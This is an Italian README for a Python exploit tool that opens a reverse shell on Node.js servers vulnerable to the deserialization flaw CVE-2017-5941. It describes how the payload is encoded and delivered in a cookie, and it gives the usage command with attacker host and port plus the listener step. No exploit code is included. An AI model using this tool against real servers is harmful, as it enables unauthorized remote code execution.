
Exploit di reverse shell per deserializzazione in NodeJs (CVE-2017-5941)
L'exploit genera automaticamente il payload di reverse shell che viene codificato in decimale e poi in base64. Successivamente, questo payload viene inviato tramite una richiesta HTTP POST che serializza l'input dell'utente e lo memorizza in un cookie. Otteniamo quindi la RCE accedendo tramite una richiesta GET.
Modalità d'uso:
python3 nodejshell.py <lhost> <lport>
lhost: il tuo indirizzo IP locale lport: la porta a cui vuoi connettere la tua reverse shell
Dopodiché devi solo fornire alcune semplici informazioni:
Fatto ciò, basta attivare il tuo listener preferito e attendere di ricevere la connessione.
